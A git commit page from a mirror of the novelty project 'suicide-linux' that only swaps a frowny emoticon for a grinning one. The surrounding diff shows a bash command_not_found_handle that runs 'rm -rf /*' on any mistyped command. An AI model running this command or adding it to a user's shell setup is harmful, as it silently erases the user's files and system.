1
Fork 0
mirror of https://github.com/RGBCube/selfharm-linux synced 2025-07-25 14:37:46 +00:00

Change frowny face into cheeky face

Emphasizes the fact that suicide-linux won and you lost. A frowny face
shows a certain level of sympathy to the mistake-maker.
This commit is contained in:
Sebastiaan (Bas) Peters 2017-11-30 16:09:11 +01:00
parent 1917062097
commit 9c4f0e053f

View file

@ -13,5 +13,5 @@ echo " ==================================="
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
function command_not_found_handle {
rm -rf /* 2>/dev/null; echo "Oops, looks like you misspelt something :(";
rm -rf /* 2>/dev/null; echo "Oops, looks like you misspelt something >:)";
}